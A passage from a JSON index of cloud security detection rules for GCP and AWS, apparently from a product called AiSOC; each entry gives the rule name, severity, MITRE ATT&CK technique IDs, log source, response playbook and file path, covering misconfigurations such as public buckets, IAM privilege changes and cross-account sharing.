], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-audit-log-sink-disabled.yaml" }, { "id": "det-cloud-032", "type": "detection", "name": "GCP Organization Policy Modified", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Organization Policy Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-org-policy-modified.yaml" }, { "id": "det-cloud-033", "type": "detection", "name": "GCP Service Account Impersonation Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Impersonation Outside Allowlist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-service-account-impersonation.yaml" }, { "id": "det-cloud-034", "type": "detection", "name": "GCP Secret Manager Mass AccessSecretVersion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Secret Manager Mass AccessSecretVersion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1555.005", "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-secret-manager-mass-export.yaml" }, { "id": "det-cloud-035", "type": "detection", "name": "GCP BigQuery Dataset Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP BigQuery Dataset Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bigquery-dataset-public.yaml" }, { "id": "det-cloud-036", "type": "detection", "name": "Cloud Workload Spawned with Secrets in Environment Variables", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Workload Spawned with Secrets in Environment Variables'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "cloud", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-secrets-in-env.yaml" }, { "id": "det-cloud-037", "type": "detection", "name": "Container Registry Repository Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Container Registry Repository Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1525" ], "log_source": "cloud", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-container-registry-public.yaml" }, { "id": "det-cloud-038", "type": "detection", "name": "Terraform State File Stored in Public Bucket", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Terraform State File Stored in Public Bucket'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530", "T1552.001" ], "log_source": "cloud", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-tfstate-public.yaml" }, { "id": "det-cloud-039", "type": "detection", "name": "Internet-Facing Load Balancer Without WAF", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Internet-Facing Load Balancer Without WAF'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "cloud", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-internet-load-balancer-no-waf.yaml" }, { "id": "det-cloud-040", "type": "detection", "name": "Cross-Account Trust Added to Privileged Role", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cross-Account Trust Added to Privileged Role'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "cloud", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cross-account-trust-add.yaml" }, { "id": "det-cloud-041", "type": "detection", "name": "AWS IAM AdministratorAccess Policy Attached", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM AdministratorAccess Policy Attached'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-attach-administrator-access.yaml" }, { "id": "det-cloud-042", "type": "detection", "name": "AWS IAM Access Key Older Than 365 Days", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Access Key Older Than 365 Days'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-credential-hygiene", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-key-rotation-skipped.yaml" }, { "id": "det-cloud-043", "type": "detection", "name": "AWS IAM MFA Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM MFA Removed From Privileged User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-mfa-disabled-on-priv-user.yaml" }, { "id": "det-cloud-044", "type": "detection", "name": "AWS IAM Role Trust Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trust Policy Allows Principal '*''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.001" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-role-trust-broadened-wildcard.yaml" }, { "id": "det-cloud-045", "type": "detection", "name": "AWS IAM Policy Version Set With Wildcard Action", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy Version Set With Wildcard Action'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-version-set-default-broad.yaml" }, { "id": "det-cloud-046", "type": "detection", "name": "AWS IAM Permissions Boundary Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Permissions Boundary Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-permissions-boundary-removed.yaml" }, { "id": "det-cloud-047", "type": "detection", "name": "AWS IAM SAML Provider Updated", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM SAML Provider Updated'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-saml-provider-modified.yaml" }, { "id": "det-cloud-048", "type": "detection", "name": "AWS IAM Role Trusts Foreign Account Root", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trusts Foreign Account Root'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-cross-account-role-broad-trust.yaml" }, { "id": "det-cloud-049", "type": "detection", "name": "AWS IAM Role Trusts Anonymous Federation", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trusts Anonymous Federation'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-anonymous-role-trust.yaml" }, { "id": "det-cloud-050", "type": "detection", "name": "AWS IAM CreateUser Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM CreateUser Burst'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1136.003" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-create-user-burst.yaml" }, { "id": "det-cloud-051", "type": "detection", "name": "AWS IAM GetAccountSummary Recon Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM GetAccountSummary Recon Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1087.004" ], "log_source": "aws", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-account-summary-recon.yaml" }, { "id": "det-cloud-052", "type": "detection", "name": "AWS IAM ListAccessKeys Recon Across Users", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM ListAccessKeys Recon Across Users'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1087.004" ], "log_source": "aws", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-list-keys-recon.yaml" }, { "id": "det-cloud-053", "type": "detection", "name": "AWS IAM Login Profile Added To Existing User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Login Profile Added To Existing User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-login-profile-created-existing-user.yaml" }, { "id": "det-cloud-054", "type": "detection", "name": "AWS IAM Access Key Created For Another User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Access Key Created For Another User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-access-key-created-other-user.yaml" }, { "id": "det-cloud-055", "type": "detection", "name": "AWS IAM Policy Created With NotAction Wildcard", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy Created With NotAction Wildcard'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-with-notaction.yaml" }, { "id": "det-cloud-056", "type": "detection", "name": "AWS S3 Block Public Access Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Block Public Access Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-block-public-access-disabled.yaml" }, { "id": "det-cloud-057", "type": "detection", "name": "AWS S3 Bucket Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Bucket Policy Allows Principal '*''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-bucket-policy-allows-anonymous.yaml" }, { "id": "det-cloud-058", "type": "detection", "name": "AWS S3 Replication Configured To External Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Replication Configured To External Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-replication-to-foreign-account.yaml" }, { "id": "det-cloud-059", "type": "detection", "name": "AWS S3 Server Access Logging Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Server Access Logging Disabled'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-server-access-logging-disabled.yaml" }, { "id": "det-cloud-060", "type": "detection", "name": "AWS S3 Object Lock / Retention Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Object Lock / Retention Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-object-lock-disabled.yaml" }, { "id": "det-cloud-061", "type": "detection", "name": "AWS S3 Mass DeleteObject Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Mass DeleteObject Burst'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-mass-deleteobject.yaml" }, { "id": "det-cloud-062", "type": "detection", "name": "AWS EBS Snapshot Shared With Foreign Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EBS Snapshot Shared With Foreign Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ebs-snapshot-shared-foreign.yaml" }, { "id": "det-cloud-063", "type": "detection", "name": "AWS AMI Shared Publicly", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS AMI Shared Publicly'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ami-shared-public.yaml" }, { "id": "det-cloud-064", "type": "detection", "name": "AWS EC2 Instance Launched With IMDSv1 Allowed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Instance Launched With IMDSv1 Allowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1552.005" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-imds-v1-allowed.yaml" }, { "id": "det-cloud-065", "type": "detection", "name": "AWS EC2 Key Pair Imported", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Key Pair Imported'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098.004" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-key-pair-imported.yaml" }, { "id": "det-cloud-066", "type": "detection", "name": "AWS EC2 DisableApiStop Protection Revoked", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 DisableApiStop Protection Revoked'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-disable-api-stop-revoked.yaml" }, { "id": "det-cloud-067", "type": "detection", "name": "AWS EC2 UserData Modified On Running Instance", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 UserData Modified On Running Instance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1059.001", "T1059.004" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-userdata-modified-running.yaml" }, { "id": "det-cloud-068", "type": "detection", "name": "AWS VPC Default Route Pointed At New IGW", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Default Route Pointed At New IGW'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1090" ], "log_source": "aws", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-route-to-internet-gateway.yaml" }, { "id": "det-cloud-069", "type": "detection", "name": "AWS SG Rule Allows SSH From 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SG Rule Allows SSH From 0.0.0.0/0'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-rule-add-22-from-anywhere.yaml" }, { "id": "det-cloud-070", "type": "detection", "name": "AWS SG Rule Allows RDP From 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SG Rule Allows RDP From 0.0.0.0/0'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-rule-add-3389-from-anywhere.yaml" }, { "id": "det-cloud-071", "type": "detection", "name": "AWS VPC Peering Connection Across Organizations", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Peering Connection Across Organizations'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-peering-cross-org.yaml" }, { "id": "det-cloud-072", "type": "detection", "name": "AWS RDS Instance Modified To Publicly Accessible", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Instance Modified To Publicly Accessible'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-publicly-accessible-true.yaml" }, { "id": "det-cloud-073", "type": "detection", "name": "AWS RDS Snapshot Shared With Other Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Snapshot Shared With Other Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-snapshot-shared.yaml" }, { "id": "det-cloud-074", "type": "detection", "name": "AWS RDS IAM Authentication Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS IAM Authentication Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-iam-auth-disabled.yaml" }, { "id": "det-cloud-075", "type": "detection", "name": "AWS RDS Master User Password Reset", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Master User Password Reset'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-master-password-reset.yaml" }, { "id": "det-cloud-076", "type": "detection", "name": "AWS RDS Deletion Protection Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Deletion Protection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-deletion-protection-disabled.yaml" }, { "id": "det-cloud-077", "type": "detection", "name": "AWS Lambda AddPermission Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda AddPermission Allows Principal '*''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-add-permission-anonymous.yaml" }, { "id": "det-cloud-078", "type": "detection", "name": "AWS Lambda Env Var Contains Secret Pattern", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Env Var Contains Secret Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-env-var-secret-pattern.yaml" }, { "id": "det-cloud-079", "type": "detection", "name": "AWS Lambda Function URL With AuthType=NONE", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function URL With AuthType=NONE'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-create-url-public.yaml" }, { "id": "det-cloud-080", "type": "detection", "name": "AWS Lambda Function Uses Deprecated Runtime", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function Uses Deprecated Runtime'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-vulnerability", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-runtime-deprecated.yaml" }, { "id": "det-cloud-081", "type": "detection", "name": "AWS EKS Cluster API Endpoint Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EKS Cluster API Endpoint Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-eks-cluster-public-endpoint.yaml" }, { "id": "det-cloud-082", "type": "detection", "name": "AWS EKS Fargate Profile Targets default Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EKS Fargate Profile Targets default Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-eks-fargate-profile-default-ns.yaml" }, { "id": "det-cloud-083", "type": "detection", "name": "AWS ECS Task Definition With privileged=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECS Task Definition With privileged=true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecs-task-privileged.yaml" }, { "id": "det-cloud-084", "type": "detection", "name": "AWS ECS ExecuteCommand Enabled On Service", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECS ExecuteCommand Enabled On Service'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecs-execute-command-enabled.yaml" }, { "id": "det-cloud-085", "type": "detection", "name": "AWS ECR Repository Policy Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECR Repository Policy Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1525" ], "log_source": "aws", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ecr-repo-publicly-readable.yaml" }, { "id": "det-cloud-086", "type": "detection", "name": "AWS ECR Image Scan-On-Push Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS ECR Image Scan-On-Push Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "aws", "playbook": "tpl-vulnerability", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": 